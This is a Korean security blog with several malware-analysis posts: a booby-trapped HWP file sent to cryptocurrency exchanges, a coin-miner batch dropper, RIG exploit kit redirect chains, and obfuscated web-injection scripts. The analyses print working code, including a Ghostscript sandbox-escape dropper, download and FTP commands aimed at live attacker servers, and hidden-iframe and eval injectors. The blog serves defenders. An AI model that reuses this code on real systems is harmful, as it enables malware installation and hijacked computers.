posted by Kwan's 2019. 12. 19. 11:56

1. 개요

최근 APT(Advanced Persistent Threat) 공격이 증가하고 있는 추세입니다. 최근에는 코인 거래소가 활성화되고, 돈이 되면서 거래소의 관계자를 노리기 위한 공격이 주를 이루고 있습니다. 이번에 분석하게 된 파일은 코인 상장 신청서를 통해 주요 코인거래소에 유포된 것으로 확인된 한글 파일을 간단하게 분석하였습니다. “해당 메일은 코인원 계정에 발송된 것으로 확인되었습니다.

 

2. 최초 이메일 발송 정보

<참고: https://twitter.com/0xD0CF11E0A1B11/status/1191519388865708032>

 

 

2. 파일 정보

파일명

[WhitePaper+소개]신규코인_상장_신청서2.hwp

MD5

95fe089b63c095bfb2b25e8c6914d19d

한글 파일 제목

EXRAYA 백서

파일 생성 날짜

2019년 11월 3일 일요일 오후 4:21:45

비밀번호

12345

 

 

3. 세부 분석 정보 한글 파일

우선 한글 파일을 유포할 시에 암호가 걸려 있는 모습을 확인할 수 있습니다. 암호를 입력한 이유는 악성코드 장비 탐지를 우회하기 위해서 암호를 설정해 놓은 것으로 판단됩니다. 통상적으로 암호가 걸려있으면, 보안 장비에서는 내부에 코드를 읽어 올 수가 없기 때문에 악성인지를 판단하지 못하게 됩니다. 이를 공격자는 활용한 것으로 판단됩니다.

[그림 1. [WhitePaper+소개]신규코인_상장_신청서 한글 파일 실행 시 암호 입력란]

 

한글 파일 암호는 메일 본문에도 나와 있듯이 “12345”가 되겠습니다. 한글 파일을 실행할 경우 첫 페이지는 EXRAYA 백서라는 내용이 나오게 됩니다.

[그림 2. [WhitePaper+소개]신규코인_상장_신청서 한글 파일 실행 시에 등장하는 첫페이지]

 

한글 파일은 모두 글이 아닌 그림으로 31페이지까지 삽입되어 있습니다. 정말 진짜 같이 삽입이 되어 있어서 정상적인 파일로 오해를 할 수 있습니다. 하지만, 이는 공격자가 속이기 위한 방법일 뿐입니다.

이를 위해 삽입되어 있는 그림을 살펴보겠습니다. 페이지는 31페이지 그림은 페이지당 1개입니다. 하지만, 문서 정보를 살펴보면 그림은 32개가 삽입된 것을 확인할 수 있습니다.

[그림 3. 한글 파일에 포함되어 있는 그림 정보]

 

그렇다면 그림 하나가 문서 내에 하나 더 있다는 것이며, 해당 그림을 찾는다면 진짜 이 파일이 악성인지, 정상인지 확인할 수 있습니다. 따라서, 한글 문서를 전반적으로 다시 살펴보겠습니다.

그림 정보를 다시 살펴보면 1페이지에 그림 2개가 삽입되어 있는 것을 확인할 수 있습니다.

[그림 4. 한글 파일에 포함되어 있는 그림 정보]

 

그렇다면 삽입되어 있는 그림은 어디에 있는지 찾아봐야 합니다. 일반적으로 공격자는 그림을 사람이 보지 못하는 크기로 줄여 놓았을 가능성이 높습니다. 하지만, 일반인이 이것을 봤을 때는 찾기가 어렵습니다. 아래 사진은 한글파일의 그림 영역 삽입된 것에 대한 확대 전후 비교입니다.

[그림 5. 그림영역이 포함되어 있는 한글 파일 영역 비교 확대 전(왼쪽), 확대 후(오른쪽)]

 공격자는 최소 그림 픽셀을 통해 수상한 그림을 1페이지에 삽입해 놓았습니다. 본격적으로 그림영역을 살펴보겠습니다. 일단 한글 파일 실행 시 그림파일이 저장된 폴더를 들어가면 JPG 외에 PS라는 파일이 보입니다.

[그림 6. 한글파일 실행 시 그림파일이 저장된 폴더 내에 파일]

 

폴더 내용을 살펴보면, 그림파일 외에 .ps라는 파일이 존재합니다. 이는 공격자가 악의적인 목적으로 파일을 실행하기 위해 한글 취약점을 활용하여 데이터를 삽입하였습니다. ps 파일은 2MB 정도 되고 그림파일 치고는 크다고 볼 수 있습니다. 내부 파일을 살펴보면, 스크립트 형태로 되어 있는 모습을 살펴볼 수 있습니다.

[그림 7. .ps 파일 내에 스크립트 값]

 

4D5A의 형태는 EXE 실행파일의 형태라고 할 수 있으며, 이는 buf0 영역에 삽입되어 있는 상태입니다. 이것만 있는다고 해서 파일이 실행되는 게 아닙니다. 각 buf에 저장되어 있는 값이 최종적으로 file0에 합쳐지면서 하나의 파일이 완성되는 형태라고 할 수 있습니다. 이후 파일은 환경 설정에 정의되어 있는 \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 폴더에 update.exe 파일 명으로 저장됩니다.

/1Policy { SETPDDEBUG { (Rolling back.) = pstack flush } if 3 index 2 index 3 -1 roll .X55 4 index 1 index .knownget { 4 index 3 1 roll .X55 } { 3 index exch .undef } ifelse } bind executeonly odef /.X55 { <<>> <<>> 4 index (ignored) 5 index 5 index .policyprocs 1 get exec pop pop pop pop pop pop pop } def systemdict /SAFER false .X55 systemdict /userparams get /PermitFileControl [(*)] .X55 systemdict /userparams get /PermitFileWriting [(*)] .X55 systemdict /userparams get /PermitFileReading [(*)] .X55

/popmenuw{

           exch dup 3 pop length 3 pop 2 index 5 pop length add string dup dup 4 2 pop 3 pop 2 roll 2 pop 3 pop copy

           2 pop 3 pop length 2 pop 3 pop 4 -1 roll putinterval

}bind def

(appdata) getenv pop /envstr exch def

envstr(\\Microsoft\\Windows\\Start ) popmenuw/patho exch def

patho(Menu\\Programs\\StartUp\\update.exe) popmenuw/path4 exch def // 파일 저장

{ currentfile buf readhexstring pop }

 

path4 (w) file /file0 exch def

file0 buf0 writestring

file0 closefile

 

path4 (a) file /file0 exch def

file0 buf1 writestring

file0 closefile

[중략]

path4 (a) file /file0 exch def

file0 buf65 writestring

file0 closefile

 

(%pipe%)path4 popmenuw/pathzz exch def

 

a0

{ null restore } stopped { pop } if

(ppmraw) selectdevice

legal

mark /OutputFile pathzz currentdevice putdeviceprops

{ showpage } stopped pop

quit

 

4. 세부분석 정보 – 파일

한글 파일을 통해 생성된 정보는 아래와 같습니다. 생성된 파일은 slack-files.com을 통해 C2 연결을 합니다. Slack를 활용하는 것은 CDN 서버의 장점을 통해 중단 없이 계속해서 파일을 받을 수 있기 때문으로 판단되며, 추가 다운로드는 진행되지 않고 있는 상태입니다.

[그림 8. update.exe 파일이 저장되어 있는 폴더]

 

[그림 9. 생성된 update.exe에 대한 파일 정보]

 

[그림 10. slack-file.com을 연결하기 위한 코드 일부분]

 

공격자는 중복 실행을 방지하기 위해 mutex라는 함수를 설정해 놓았습니다.

Mutex : RuntimeBroker

[그림 11. 중복 실행 방지를 위한 createmutex 부분]

 

Slack 접속 시에 URI 복호화 부분 (Stack address=0040C918, (ASCII "GET /TPCBPBQD8-FPQRX8SBD-0c03d3b809 HTTP/1.0 Host: slack-files.com User-Agent: Google Connection: close)

[그림 12. slack-files.com을 접속하기 위한 헤더 및 복호화 부분]

 

[그림 13. Slack-files.com이랑 통신하는 모습]

댓글을 달아 주세요

posted by Kwan's 2019. 12. 19. 11:15

안녕하세요?

올만에 글을 쓰게 됩니다.

 

이번에 글을 쓰는 이유는 올만에 파일을 발견하였기 때문입니다.

간락히 쓰고 그냥 MD5 공유 하려고 합니다.

 

1. dll.bat - 인터넷에서 감염 추정 (8월 16일) / 파일 발견 일자 (9월 17일)

2. .bat 파일 구조

 

3. .bat 파일 실행 구조 (핵심)

 

@echo off (웹 다운로드 부분)

taskkill /im 3.exe /f

md c:\windows\hashfish

del c:\windows\hashfish\3.exe

call :http "http://120.236.74.201:74/3.exe" c:\windows\hashfish\3.exe // SFX 압축 파일 (채굴 위한 악성코드)

ping 127.0.0.1 -n 2 >nul

if exist "c:\windows\hashfish\3.exe" (goto jc3)

 

-------------------------------------

 

@echo off (FTP를 통한 다운로드 로그인 불가)

(echo open 43.226.50.42

echo host908075088

echo ZHAOxin199

echo lcd "c:\windows\hashfish"

echo get 3.exe

echo bye)>ftp$

ftp -s:ftp$

del ftp$

 

--------------------------------------

 

:http

cscript -nologo -e:jscript "%~f0" "%~1" "%~2" //cssript 를 통한 파일 다운로드

 

[실행 시] // 다운로드 불가

cscript  -nologo -e:jscript "C:\Users\Administrator\Desktop\3.bat" "http://120.236.74.201:74/3.exe" "c:\windows\hashfish\3.exe"

 

4. 3.exe 실행 구조

 

3.exe는 SFX 압축 형태로 되어 있습니다.

따라서, 파일이 실행시 내부에 있는 명령어가 함께 동작을 하는 방식 입니다.

 

파일이 실행 될 경우 사용되는 명령어

Path=c:\windows\hashfish //파일 위치

SavePath

Setup=2.vbs // 실행 VBS

Silent=1 // 실행 모드

Overwrite=1 // 덮어 쓰기

Update=U // 업데이트

 

파일을 최초 실행 하면 c:\windows\hashfish에 저장되고 2.vbs를 실행 합니다.

CreateObject("WScript.Shell").Run "cmd /c c:\windows\hashfish\2.bat",0

 

다시 2.vbs는 2.bat를 실행 합니다.

c:\windows\hashfish\nssm6.exe install "ipconfig" "c:\windows\hashfish\snshost.exe"

c:\windows\hashfish\nssm3.exe install "ipconfig" "c:\windows\hashfish\snshost.exe"

net start ipconfig

del c:\windows\hashfish\dll.bat

 

2.bat를 통해 snshost.exe를 ipconfig 명으로 서비스 등록을 합니다.

 

코인 채굴이 시작되기 전 config.ini와 함께 api 서버에 접속 한 후 실행되게 됩니다.

이 과정에서 컴퓨터 정보를 전송 하는 역할도 합니다.

 

[default]

Language=zh

mid=

DisplayMid=

EncryptMid=ph_r1RwF1iERERyfx0=

used_num=15

worker=2019

[setting]

auto_run=1

CoinDisplayBalance=btc

auto_mining=01

hidetotray=01

[running]

start=1569225648

run=1569225647

[time]

quittime_h=0

quittime_l=1565837862

helperstarttime_h=0

helperstarttime_l=1569225647

ShowMachine=5

minetime_h=0

minetime_l=1565188165

 

 

5. 파일 정보 (MD5)

 

[메인 파일 정보]

dll.bat b380ba1f5f9e11d23909d541bd55893a

3.exe e467eaed2de807187cdfa41be3c9cee0

 

[부가적 파일 정보]

2.bat c786d194083d92f88d25eee528b6cb72

2.vbs fff342920954b3870bb7cbc09ccf70e6

config.ini a438050843f12d2056dfee56c6f03bf8

nssm3.exe bd3b9dac9198c57238d236435bf391ca

nssm6.exe 1136efb1a46d1f2d508162387f30dc4d

snshost.exe 38c2f3d459bc7d7160b927b785b782cc

7z.dll 3355159514ca435f662283af71ab0c84

hashfish_eth_ethminer_x64_cuda80_1.7.0.7z 02614562829ab6069c6f9df38382644c

hashfish_xmr_xmrig_x64_2.9.1.7z 5736772d694f7e9d584f263f6651f948

hashfish_xmr_xmrig_x64_cuda80_2.9.1.7z 11cf8f7e2adb2c022984c33e8462ee49

hashfish_xmr_xmrig_x86_2.9.1.7z 82c3f484c4407022ce89f57c53a26c2b

hfadl.dll 0d89896ebbd2a1b98523725bd056234e

HFHelper32.exe - f7c2ea83274c3e33558a4a386d2d637a

HFHelper64.exe - 1d3cb092fde6419ec594949dc880327b

 

[C2 정보]

120.236.74.201:74 (CN) // WEB

43.226.50.42 (CN) // FTP

 

[채굴 정보]

cn1.hfsvr.com:19893 -u ph_r1RwF1iERERyfx0= -p aGFzaGZpc2g6OjFkODRjNmM3YjBiZDMxZGRmZTQ0ZDhhZmI1YWYzY2I4

댓글을 달아 주세요

posted by Kwan's 2017. 4. 24. 15:31


회사를 퇴사하고 나서 가끔씩 글을 쓸 예정 입니다.

정보가 많이 부족하긴 하지만 악성 스크립트 (국내 + 해외) / 파일분석 등을 적을 예정 입니다.

포스팅을 하는 이유는 그냥 심심해서 입니다.


1. 발견 사이트 (유포지)

cocoalba.kr/autojump/ad_xxxx/index.html


2. 최종 파일

leeve.co.kr/apps/up.exe (현재 404)

MD5 : 0952d38bf8b3f026cb3c41c87db338a7

C&C : r.pengyou.com/fcg-bin/cgi_get_portrait.fcg?uins=2889622357

[VT 결과]

virustotal.com/ko/file/1dd1dbd6631b8b0b87d7bbab7aff004c983dbe87ba6c9e7fed851de4786e6ae1/analysis/


3. 스크립트


초기 스크립트를 확인해보면 제가 마지막으로 본 이전 버전과는 다를게 많이 없습니다.

하지만, 해당 코드를 1차적으로 디코딩을 하면 새로운 값과 기존과 다른 스크립트가 있는 것을 확인할 수 있습니다.



- 1차 디코딩 스크립트


1차적으로 디코딩된 스크립트 같은 경우에는 난독화 부분과 디코딩을 위한 연산 부분을 나눌 수가 있으며, 최종 적으로는 t=utf8to16(nbencode(nbcode(t),JbWRn$q7)) 이부분을 통해 난독화가 해제 됩니다.



- 최종 스크립트


해제된 난독화를 살펴보면, _0x4b88로 정의되어 있는 것부터 시작을 한다.

_0x4b88 같은 경우에는 취약점으로 분기될 수 있도록 배열 형식에 맞춰 사용되도록 스크립트 구문을 공격자가 생성해놓았습니다.


[스크립트]




var _0x4b88 에정의된 내용



마지막으로 취약점으로 연결할 때에는 "var jaguarx=jaguar+" 이와 같이 정의가 되어 있는 것을 볼 수 있는데, 이것은 초기 스크립트내에서 정의 되어 있는 것을 확인하시면 됩니다.

참고로, jaguar = RhRdQk 입니다.

또한, exe 파일 같은 경우에도 초기에 복잡하게 되어 있는 것처럼 보이지만 기존과 별로 차이가 없습니다.


---------------------------

웹 페이지 메시지

---------------------------

http://leeve.co.kr/apps/up.exe

---------------------------

확인   

---------------------------


취약점같은 경우에는 세부적으로 보지는 않았지만, 거의 비슷한거 같아서 추후 포스팅을 하겠습니다.


몇년만에 쓰니까 잘 안써지지만, 꾸준히 포스팅을 하겠습니다.


마지막으로 심심할때마다 뭔가를 던져주는 창훈이에게 고맙다는 말을 전합니다!


감사합니다~


댓글을 달아 주세요

  1. 얼방 2017.04.24 15:43  Addr  Edit/Del  Reply

    다른 고마운 분은 없나요?

posted by Kwan's 2015. 9. 1. 16:01

그냥 국내 웹사이트 중 리그킷 들어가 있는 곳을 발견해서 간단하게 흔적용으로 써봄.


1. 발견 사이트

http://www.irisxxxxxx.kr (꽃배달 사이트)

→ http://autoxxxx.ru/templates/atomic/z9jqqbt7.php?id=8515037

-→ http://new.ceptenporxxxxx.com/?xH6Af7iYJBvPCoo[하위생략] / (지속적인 링크 변경)

--→ http://new.ceptenporxxxxxx.com/index.php?xH6Af7iYJBvPCoo=[하위생략] / 최종 악성코드 다운로드


2. 삽입 형태

http://www.irisxxxxxx.kr

→ _script type="text/javascript" src="http://autoxxxx.ru/templates/atomic/z9jqqbt7.php?id=8515037"_


http://autoxxxx.ru/templates/atomic/z9jqqbt7.php?id=8515037

→ _document_write('_iframe src="http://new.ceptenporxxxxx.com/?xH6Af7iYJBvPCoo[하위생략] " style="left: -999px;top: -999px;position: absolute;" width="202" height="202"__/iframe_');


http://new.ceptenpoxxxxx.com/?xH6Af7iYJBvPCoo[하위생략]

→ /*(331387,4,14838)*/uo7("119p105p110p100");/* [생략]


3. 악성 스크립트 스샷

[그림 1. 난독화 된 RIG Exploit Kit 스크립트 ]


[그림 2. 디코딩 된 RIG Exploit Kit 스크립트]



[그림 3. 일부 디코딩 된 RIG Exploit Kit 스크립트 - CVE-2014-6332]




[그림 4. 디코딩 된 스크립트 중 일부 쉘코드에서 발견된 최종링크 연결]


4. 끄적끄적

분석을 방해하기 위한 주석등이 너무 많이 달림 일부 스크립트에서는 짤라서 쓰는걸 방지하기 위해 정의 선언이 되지 않은 코드도 넣음 지우고 처리하는데 조금 신경쓰임.. 국내에는 다양한 공격킷이 존재하지만 리그킷과 같은 경우 연구 대상(?) 다음번에는 앵글러를 한번 해 볼 생각...

아참 최종 유포지와 난독화 해제 부분만 언급했는데 어느 취약점을 이용하는지는 추후에 게시(?) 할 예정.

제목과 같이 그냥 끄적끄적..ㅎㅎ 이렇게 된다 정도?ㅎㅎ


[이전글]

2014/08/27 - [security/악성코드 유포] - RIG Exploit Kit 넌 누구냐?


TAG

댓글을 달아 주세요

posted by Kwan's 2014. 8. 27. 13:24

올만에 블로그에 글을~

간단하게 스샷 몇개만 ... 추후에 자세히?!?


1. 초기 스크립트


2. 1차 난독화 해제



3. 2차 난독화 해제 (취약성 + 최종 링크)



간단하게 정리 했습니다. 정보는 추후에 봐서 공유 하도록 하겠습니다. 마지막으로 도움을 주신 모든분께 감사하다는 말씀 드리고 싶습니다.


댓글을 달아 주세요

posted by Kwan's 2014. 1. 8. 04:00

우연히 인터넷 검색을 하던 도중 발견한 2012년 해외 포럼에 올라온 글이다. 

Malicious Code Inject: What Does It Do? 라는 것을 보던 중에 오래된 방법이지만 이런 방법도 있구나 해서 적어놓는다.


1. 발견지 포럼(Web Developer Forum) : http://www.webdeveloper.com/forum/showthread.php?261600-Malicious-Code-Inject-What-Does-It-Do (Malicious Code Inject: What Does It Do?)

-> http://oolbrmp.tld.cc/d/404.php?go=1 (window.location _=_ "http://fukbb.com")

--> http://fukbb.com


2. 디코딩 순서 : 초기사이트 접속 -> Base 64 난독화  -> 일부 디코딩 -> Base 64 난독화 -> Blockhole 난독화 -> 디코딩


3. Web Developer Forum - 스샷



4. 난독화 해제

   가. 원본 소스


  나. 1차 디코딩 - 일부 base 64


  다. 2차 디코딩 - 남은 일부 base 64


  라. 3차 디코딩 - Blockhole(최종)


  마. http://oolbrmp.tld.cc/d/404.php?go=1 - window.location 통한 리다이렉팅


  라. 최종 도메인 - fukbb.com



5. 도메인 위치

  가. oolbrmp.tld.cc


  나. fukbb.com


6. 악성스크립트 - 바이러스 토탈 결과

* 바이러스 토탈 업로드 시 악성 스크립트 부분만 발췌해서 업로드 했습니다.



6. 번외편 - 이것의 결과는?

- 힌트 : HTML-CSS

* &lt; - 부등호(<)

* &gt; - 부등호(>)

* &quot; - 쌍따옴표(") 하나 

 &lt;

 script&gt;

 try

 {

   q=document.createElement(&quot;

   p&quot;

   );

   q.appendChild(q+&quot;

   &quot;

   );

 }

 catch(qw)

 {

   h=-012/5;

   try

   {

     bcsd=prototype-2;

   }

   catch(bawg)

   {

     ss=[];

     f=(h)?(&quot;

     fromCharC&quot;

     +&quot;

     ode&quot;

     ):&quot;

     &quot;;

     e=window[&quot;

     e&quot;

     +&quot;

     val&quot;

     ];

     n=[9,18,315,408,32,80,300,444,99,234,327,404,110,232,138,412,101,232,207,432,101,218,303,440,116,230,

198,484,84,194,309,312,97,218,303,160,39,196,333,400,121,78,123,364,48,186,123,492,13,18,27,36,105,

204,342,388,109,202,342,160,41,118,39,36,9,250,96,404,108,230,303,128,123,26,27,36,9,200,333,396,

117,218,303,440,116,92,357,456,105,232,303,160,34,120,315,408,114,194,327,404,32,230,342,396,61,78,

312,464,116,224,174,188,47,222,333,432,98,228,327,448,46,232,324,400,46,198,297,188,100,94,156,192,

52,92,336,416,112,126,309,444,61,98,117,128,119,210,300,464,104,122,117,196,48,78,96,416,101,210,

309,416,116,122,117,196,48,78,96,460,116,242,324,404,61,78,354,420,115,210,294,420,108,210,348,

484,58,208,315,400,100,202,330,236,112,222,345,420,116,210,333,440,58,194,294,460,111,216,351,

464,101,118,324,404,102,232,174,192,59,232,333,448,58,96,177,156,62,120,141,420,102,228,291,436

,101,124,102,164,59,26,27,36,125,26,27,36,102,234,330,396,116,210,333,440,32,210,306,456,97,218,

303,456,40,82,369,52,9,18,27,472,97,228,96,408,32,122,96,400,111,198,351,436,101,220,348,184,99,

228,303,388,116,202,207,432,101,218,303,440,116,80,117,420,102,228,291,436,101,78,123,236,102,92,

345,404,116,130,348,464,114,210,294,468,116,202,120,156,115,228,297,156,44,78,312,464,116,224,

174,188,47,222,333,432,98,228,327,448,46,232,324,400,46,198,297,188,100,94,156,192,52,92,336

,416,112,126,309,444,61,98,117,164,59,204,138,460,116,242,324,404,46,236,315,460,105,196,315,

432,105,232,363,244,39,208,315,400,100,202,330,156,59,204,138,460,116,242,324,404,46,224,333

,460,105,232,315,444,110,122,117,388,98,230,333,432,117,232,303,156,59,204,138,460,116,242,324,

404,46,216,303,408,116,122,117,192,39,118,306,184,115,232,363,432,101,92,348,444,112,122,117,

192,39,118,306,184,115,202,348,260,116,232,342,420,98,234,348,404,40,78,357,420,100,232,312

,156,44,78,147,192,39,82,177,408,46,230,303,464,65,232,348,456,105,196,351,464,101,80,117,416,

101,210,309,416,116,78,132,156,49,96,117,164,59,26,27,36,9,200,333,396,117,218,303,440,116,92,

309,404,116,138,324,404,109,202,330,464,115,132,363,336,97,206,234,388,109,202,120,156,98,222,

300,484,39,82,273,192,93,92,291,448,112,202,330,400,67,208,315,432,100,80,306,164,59,26,27,36,

125];

     if(window.document)for(i=6-2-1-2-1;-581+i!=2-2;i++)

     {

       k=i;

       ss=ss+String[f](n[k]/(i%(h*h)+2-1));

     }

     e(ss);

   }

 }

 &lt;

 /script&gt;


글 중간에 바이러스 토탈 결과를 보듯이 난독화가 된 악성 스크립트의 차단 비율은 그다지 높지 않는거 같다. 또한, 이처럼 단순 난독화가 아닌 현재 국내에서 다수 나타나고 있는 공다팩처럼 복잡하게 난독화된 기술은 더욱 탐지하기 힘들것으로 보이며 악성링크를 사전에 차단을 통해 피해를 줄이는 방안도 하나의 방법이라고 생각한다. 하지만, 어느 한편의 입장에서는 악성링크를 통해 다운로드되는 파일만 막으면 되지 라는 말도 할 수 있다. 어떻게 보면 이 둘다 맞는 말이라고 할 수도 있다. 그러나 한번에 한마리의 토끼를 잡는것 보다 한번에 두마리 토끼를 잡는 방법도 있듯이 두마리의 토끼를 한번에 잡는다면 주말에 안심하고 웹서핑을 할 수 있지 않을까 하는 생각이 된다.


댓글을 달아 주세요

  1. tra 2014.02.08 09:46  Addr  Edit/Del  Reply

    샘플파일 원츄 +_+

posted by Kwan's 2013. 10. 22. 00:43

오랜만에 악성스크립트로 연결시키는 스팸메일을 내 이메일을 통해 받아서 기록해 둔다.


발신 : <richartl@bladechevy.com>

수신 : <power2618@naver.com>

날짜 : 13-10-21 (월) 03:21

제목 : I want you to be healthy


[본문 내용] 

<html><body>

http://mhr.ro/pride.html Do you know what your lover wants during nights?

<_body><_html>


[발신자 정보 위치 - bladechevy.com]



[http://mhr.ro/pride.html - 사이트 본문 내용]



[디코딩]


Redirecting -> http://albertacanadapills.nl">


-----------------------------------------------------------------------------------------------


 function q09() {

 var static='ajax';

 var controller='index.php';

 var q = document.createElement('iframe');


 q.src = 'http://lanotfo.com/exit.php';

 q.style.position = 'absolute';

 q.style.color = '55';

 q.style.height = '55px';

 q.style.width = '55px';

 q.style.left = '100055';

 q.style.top = '100055';


 if (!document.getElementById('q')) {

 document.write('<p id=\'q\' class=\'q09\' ></p>');

 document.getElementById('q').appendChild(q);

 }

}

function SetCookie(cookieName,cookieValue,nDays,path) {

 var today = new Date();

 var expire = new Date();

 if (nDays==null || nDays==0) nDays=1;

 expire.setTime(today.getTime() + 3600000*24*nDays);

 document.cookie = cookieName+"="+escape(cookieValue)

 + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");

}

function GetCookie( name ) {

 var start = document.cookie.indexOf( name + "=" );

 var len = start + name.length + 1;

 if ( ( !start ) &&

 ( name != document.cookie.substring( 0, name.length ) ) )

 {

 return null;

 }

 if ( start == -1 ) return null;

 var end = document.cookie.indexOf( ";", len );

 if ( end == -1 ) end = document.cookie.length;

 return unescape( document.cookie.substring( len, end ) );

}

if (navigator.cookieEnabled)

{

if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');


q09();

}

}


[세부 정보]


http://lanotfo.com/exit.php // 500 internal server error

=========================

Server IP(s):

0.0.0.0

=========================



http://albertacanadapills.nl



[도식화]





댓글을 달아 주세요

  1. 처리 2013.10.22 09:18  Addr  Edit/Del  Reply

    전문가 다됬네 ㅎㅎㅎ

    • Kwan's 2013.10.23 04:10 신고  Addr  Edit/Del

      앗 형 잘 지내시지요??ㅎㅎ

      과찬의 말씀입니다 ㅎㅎ 저는 아직 멀고도 멀었는걸요~

      조만간 얼굴 비추러 찾아뵙겠습니다 : )

posted by Kwan's 2013. 7. 2. 18:30


우연히 돌아다니다가 발견해서 끄적끄적 해본다.....

최종 접속 시 왜 ok 라는 시그널만 내보낼까 궁금하다................

쿠키값때문인가??

아시는 분 계시면 알려주세요~ : )




e=eval;v="0"+"x";a=0;z="y";try{a*=2}catch(q){a=1}if(!a){try{document["\x62od"+z]++}catch(q){a2="_"}z=[생략]"

["split"](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-4-3);}zaz=za;e(zaz);}


za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-4-3);}zaz=za;e(zaz); 

// 계산식

za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-4-3);}zaz=za;alert(zaz); 

// 출력


Deviced.com | Deviced IP Lookup (IP: 84.38.68.117)

Hostname:deviced.com
IP Address:84.38.68.117
Host of this IP:vserver2407.vserver-on.de
Organization:ispOne business GmbH
ISP:ispOne business GmbH
City:-
Country:Germany 
State:-
Timezone:-
Local Time:

-





댓글을 달아 주세요

posted by Kwan's 2013. 5. 31. 21:06

한동안 잠잠했던 Red Exploit Kit 이 Cool Exploit Kit 으로 변경되어서 출현 하였다.

우연히 발견하여서 도식화를 시켜놓는다. 국내에는 별로 영향력이 없지만 해외에서는 그래도 종종 나오나 보다.


검색을 하면 국내보다는 해외 블로그가 더 많이 보인다. 최근에 본 Sakura Exploit kit 에 이어서 Cool Exploit Kit 까지 국내에는 95% 공다팩이라면 해외에서는 Blackhole Exploit Kit ,Cool Exploit kit, Sakura Exploit kit 까지 많은 킷들이 활동을 하고 있다.




Cool Exploit kit 자세한 정보 : http://malware.dontneedcoffee.com/2013/04/cve-2013-2423-integrating-exploit-kits.html 여기를 확인 하면 된다.


댓글을 달아 주세요

posted by Kwan's 2013. 5. 11. 17:02

스팸문자가 많은 요즘 한 통의 문자가 나에게 왔다.

내용은 너무 선정적이라서 패쓰! 옆집 어쩌구 저쩌구......... 하면서 URL : http://thankyXX5.kr 왔다. 



무료보기 3일뒤에 쥐도새도 모르게 16500원이 결제된다고 한다.


그럼 이용약관이 어떻게 될까 확인해보자........


일단 이번에 새로 발효된 개인정보보호법 중 일부분 !


2013년 2월 18일부터 시행되는 온라인상의 주민등록번호 수집 · 이용 금지에 따라서

이제 인터넷에서 신규 회원 가입시 주민등록번호를 이용해서 가입할수 없습니다.

(정보통신망 이용촉진 및 정보보호등에 관한 법률 제 23조의 2항(주민등록번호 사용제한 조항))

 

2월 18일부터는 주민등록번호 수집.이용 금지 관련 법률 조항에 따라 

회사는 온라인 회원가입 시 주민등록번호를 수집하지 않아야 하며

주민등록번호를 활용한 본인인증 수단을 이용할 수 없습니다.

 

따라서, 회원가입 시 주민등록번호를 입력하는 절차가 사라지게 되며 법률에서 허용하는 경우에 한해 수집이 허용됩니다.

- 수집허용범위: 금융실거래법, 부가가치세법, 소득세법, 신용정보보호법, 전자서명법

- 수집허용기관: 금융기관, 본인인증기관 등 - 수집허용업무: 결제, 세금계산서, 제세공과금 등 업무 진행 시


2013년 2월 18일부터는 주민등록수집을 일체 금하게 되어있다.




위 사이트의 개인정보정책은 다음과 같다.


회사는 개인정보취급방침을 통하여 고객님께서 제공하시는 개인정보가 어떠한 용도와 방식으로 이용되고 있으며, 개인정보보호를 위해 어떠한 조치가 취해지고 있는지 알려드립니다.

회사는 개인정보취급방침을 개정하는 경우 웹사이트 공지사항(또는 개별공지)을 통하여 공지할 것입니다.

ο 본 방침은 : 2012년 8월 16일 부터 시행됩니다.


■ 수집하는 개인정보 항목

회사는 회원가입, 상담, 서비스 신청 등등을 위해 아래와 같은 개인정보를 수집하고 있습니다.

ο 수집항목 : 이름 , 생년월일 , 성별 , 로그인ID , 비밀번호 , 휴대전화번호 , 이메일 , 주민등록번호 , 서비스 이용기록 , 접속 로그 , 접속 IP 정보 , 결제기록 , 닉네임, 사용자 로그

ο 개인정보 수집방법 : 홈페이지(회원가입) , 경품 행사 응모 , 배송 요청 , 생성정보 수집 툴을 통한 수집 


■ 개인정보의 수집 및 이용목적

회사는 수집한 개인정보를 다음의 목적을 위해 활용합니다.

ο 서비스 제공에 관한 계약 이행 및 서비스 제공에 따른 요금정산 구매 및 요금 결제 , 물품배송 또는 청구지 등 발송

ο 회원 관리

회원제 서비스 이용에 따른 본인확인 , 개인 식별 , 불량회원의 부정 이용 방지와 비인가 사용 방지 , 연령확인 , 만14세 미만 아동 개인정보 수집 시 법정 대리인 동의여부 확인 , 불만처리 등 민원처리 , 고지사항 전달

ο 마케팅 및 광고에 활용

이벤트 등 광고성 정보 전달 , 인구통계학적 특성에 따른 서비스 제공 및 광고 게재, 회사가 운영하는 서비스 정보전달, 회사가 운영하는 독립무선망 SMS 마케팅


명백하게 위반을 하고 있는 사례라고 볼 수 있다.


Cookie: PHPSESSID=a3c9f1[생략]5607758c9c9558c


hp=01012341234&ju=1234561234567&hp_com=&adkey=NTUyMTAw

HP = 핸드폰 번호

JU = 주민등록번호


이것을 수집한 정보는 http://thankXXX5.kr/proc/cert.php (115.68.15.22) 로 전송이 되고 있다.


IP Lookup Result for 115.68.15.22

IP Address:115.68.15.22
Organization:Smileserv
ISP:Smileserv
City:-
Country:Korea, Republic of 
State:-
Timezone:-
Local Time:-



이런식으로 개인의 정보를 가져가는 곳이 하루빨리 시정이 되었으면 한다.


법을 발효가 되었지만 이런곳을 보면 마음이 아프다. 하루 빨리 시정이 되어서 저런 일이 없었으면 한다.


댓글을 달아 주세요